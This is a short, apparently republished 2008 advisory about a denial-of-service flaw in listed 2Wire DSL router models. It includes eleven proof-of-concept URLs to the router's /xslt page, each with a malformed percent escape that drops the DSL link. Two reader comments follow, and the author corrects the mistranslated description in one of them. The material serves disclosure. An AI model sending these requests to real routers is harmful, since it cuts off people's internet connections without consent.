|
|
| |
| The DSL connection of some 2wire routers is droped when a request to /xslt with the value %X where X is any non alfa numeric character. |
| |
Credit:
The information has been provided by hkm.
The original article can be found at: http://www.milw0rm.com/exploits/7060
|
| |
Vulnerable Systems:
* 2WIRE DSL Router 1701HG
* 2WIRE DSL Router 1800HW
* 2WIRE DSL Router 2071HG
* 2WIRE DSL Router 2700HG Gateway
* 2WIRE DSL Router firmware version 3.17.5
* 2WIRE DSL Router firmware version 3.7.1
* 2WIRE DSL Router firmware version 4.25.19
* 2WIRE DSL Router firmware version 5.29.51
Exploit:
http://gateway.2wire.net/xslt?page=%&
http://gateway.2wire.net/xslt?page=%@
http://gateway.2wire.net/xslt?page=%!
http://gateway.2wire.net/xslt?page=%+
http://gateway.2wire.net/xslt?page=%;
http://gateway.2wire.net/xslt?page=%'
http://gateway.2wire.net/xslt?page=%~
http://gateway.2wire.net/xslt?page=%*
http://gateway.2wire.net/xslt?page=%0
http://gateway.2wire.net/xslt?page=%9
http://gateway.2wire.net/xslt?page=%?
|
| Subject:
|
Regarding Description |
Date: |
10 Nov. 2008 |
| From: |
Jack.buddygmail.com |
Hi,
In description it is mentioned as non - alpha numeric character but where as in exploit examples
http://gateway.2wire.net/xslt?page=%0
http://gateway.2wire.net/xslt?page=%9
numeric character is mentioned. Which one is correct? |
|
| Subject:
|
Description is wrong, but PoCs are ok. |
Date: |
18 Nov. 2008 |
| From: |
hkm |
You are absolutely right the description got lost in translation. The original article is in: http://www.hakim.ws/2wire/dsldos.html
It should read:
DSL connection of 2wire can be reset by sending a request to xslt with a variable set to any character that is NOT alphabetical (a-Z).
This is a variation from the 2wire CRLF DoS because that DoS resets the whole router, this one only the DSL connection,
hkm |
|
|
|
|
